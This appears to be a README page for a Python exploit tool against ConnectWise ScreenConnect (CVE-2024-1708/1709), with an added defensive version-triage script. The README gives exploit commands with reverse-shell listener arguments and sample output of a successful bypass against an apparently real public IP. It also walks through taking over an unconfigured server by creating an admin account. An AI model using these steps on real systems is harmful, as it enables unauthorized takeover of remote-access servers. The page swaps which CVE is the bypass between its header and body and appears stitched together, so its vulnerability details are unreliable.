
CVE-2024-1709 PoC — ConnectWise ScreenConnect Security Vulnerability

Source
Related vulnerability
Title: ConnectWise ScreenConnect Security Vulnerability (CVE-2024-1709)
Description: ConnectWise ScreenConnect is a self-hosted remote desktop software application from ConnectWise. ConnectWise ScreenConnect 23.9.7 and earlier contain a security vulnerability: the product is affected by an authentication bypass using an alternate path or channel, which may allow an attacker direct access to confidential information or critical systems.
Description
A Python tool to check & exploit CVE-2024-1708 & CVE-2024-1709 in ConnectWise ScreenConnect
Introduction
# ScreenConnect CVE-2024-1709 Exploit Tool
A Python tool to check for and exploit the authentication bypass (CVE-2024-1708) and resulting remote code execution (CVE-2024-1709) vulnerabilities in ConnectWise ScreenConnect (ConnectWise Control).
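Before running any checker against a server, the defender-side question is simply which hosts in the estate still report a version in the affected range stated at the top of this page (23.9.7 and earlier, with 23.9.8 the release named in the linked ConnectWise bulletin). The script below is an added example and is not code from the PoC repository; it assumes version strings are dot-separated integers such as `23.9.7.8818`, and the hostnames and build numbers in `SAMPLE_INVENTORY` are constructed, not real systems.

```python
"""Inventory triage for the CVE-2024-1709 affected range.

Added example; not code from the PoC repository described on this page.
It assumes only what the page states: ScreenConnect 23.9.7 and earlier
are affected and 23.9.8 (the release named in the ConnectWise bulletin)
is the first fixed version. Version strings are assumed to be
dot-separated integers such as "23.9.7.8818"; anything else is flagged
for manual review rather than guessed at.
"""
import re
from typing import Dict, List, Tuple

# First release that is NOT affected, per the bulletin linked on this page.
FIXED_VERSION: Tuple[int, ...] = (23, 9, 8)

# Constructed sample inventory (hostname -> reported version); not real hosts.
SAMPLE_INVENTORY: Dict[str, str] = {
    "sc-hq-01": "23.9.8.8811",
    "sc-branch-02": "23.9.7.8818",
    "sc-lab-03": "22.1.10.7898",
    "sc-dmz-04": "beta",
}


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '23.9.7.8818' into (23, 9, 7, 8818); raise on anything else."""
    version = version.strip()
    if not re.fullmatch(r"\d+(\.\d+)*", version):
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in version.split("."))


def is_affected(version: str) -> bool:
    """True when the version sorts below 23.9.8, i.e. 23.9.7 or earlier.

    Tuple comparison handles build numbers naturally: (23, 9, 7, 8818) is
    below (23, 9, 8), while (23, 9, 8, 8811) is above it.
    """
    return parse_version(version) < FIXED_VERSION


def triage_inventory(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Sort hosts into affected / patched / unknown buckets.

    Hosts whose version cannot be parsed land in 'unknown' so that a
    malformed banner never silently counts as patched.
    """
    result: Dict[str, List[str]] = {"affected": [], "patched": [], "unknown": []}
    for host, version in inventory.items():
        try:
            bucket = "affected" if is_affected(version) else "patched"
        except ValueError:
            bucket = "unknown"
        result[bucket].append(host)
    for hosts in result.values():
        hosts.sort()
    return result


if __name__ == "__main__":
    for bucket, hosts in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{bucket:>8}: {', '.join(hosts) or '-'}")
```

Feeding it the version each server reports (from the admin page or your asset database) gives a patch list without touching the servers' authentication surface; anything that fails to parse is deliberately kept out of the "patched" bucket so it gets a manual look.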

### Description
This tool performs two main functions:

- **Check Mode:** Tests a target ConnectWise ScreenConnect server for the authentication bypass vulnerability (CVE-2024-1708).
- **Exploit Mode:** Attempts to exploit the vulnerability chain, provides reconnaissance on accessible endpoints, and guides manual exploitation, particularly for targets in the initial setup phase.

### Features
- **Vulnerability Checking:** Quickly determines if a target is vulnerable.
- **Admin Endpoint Discovery:** Automatically searches for accessible administrative panels after a successful auth bypass.
- **Setup Mode Detection:**  Identifies targets that are in the initial setup state, allowing for manual admin account creation.
- **Clear Reporting:** Provides clear, color-coded output on the target's status.

## Usage

### Prerequisites

- Python 3.x
- The `requests` library.

Install the required library:
```bash
pip install requests
```
### Basic Usage
To check if a target is vulnerable:
```bash
python3 screenconnect_exploit.py -u http://target-server:8040 -c
```

### Exploitation Guidance
The tool can also guide exploitation attempts. You must specify a listener IP and port (even if the final payload delivery is manual).

```bash
python3 screenconnect_exploit.py -u http://target-server:8040 -l YOUR_IP -p 4444
```
### Arguments

| Argument | Description | Required For |
| :--- | :--- | :--- |
| `-u URL`, `--url URL` | Target URL (e.g., `http://10.0.0.1:8040`) | Always |
| `-c`, `--check` | Run in check-only mode | Check |
| `-l LHOST`, `--lhost LHOST` | Listen IP address for reverse shell | Exploit |
| `-p LPORT`, `--lport LPORT` | Listen port for reverse shell | Exploit |

## Example Output

```text
[*] Checking target: http://99.230.149.89:8040
[*] VULNERABLE: Authentication bypass successful!
```

## Exploitation Reconnaissance

```text
[*] Attempting exploitation on http://99.230.149.89:8040
[*] Checking target: http://99.230.149.89:8040
[*] VULNERABLE: Authentication bypass successful!
[*] Found accessible admin endpoint: /Administration
[*] Target is in setup mode - you can create admin account manually!
[*] Visit: http://99.230.149.89:8040
[*] Create an account with valid email format (user@example.com)
```

## Manual Exploitation Steps

If the tool finds a vulnerable target but automated RCE fails, follow these steps:

1. **Access the Admin Panel:** The tool will output accessible URLs like `http://target:8040/Administration`. Open this in your browser.

2. **Complete Setup (if applicable):** If the tool detects "setup mode," go to the main URL and create the first admin account using a **valid email address**.

3. **You're In:** Once in the admin panel, you have full control of the ScreenConnect instance.

## Disclaimer

This tool is provided for **educational and authorized testing purposes only.** The user is responsible for ensuring they have explicit permission to test any system before using this tool. Unauthorized use against any system is illegal.

## License

This project is licensed under the MIT License - see the LICENSE file for details.

## References

- [ConnectWise Security Bulletin](https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8)
- [CVE-2024-1708](https://nvd.nist.gov/vuln/detail/CVE-2024-1708)
- [CVE-2024-1709](https://nvd.nist.gov/vuln/detail/CVE-2024-1709)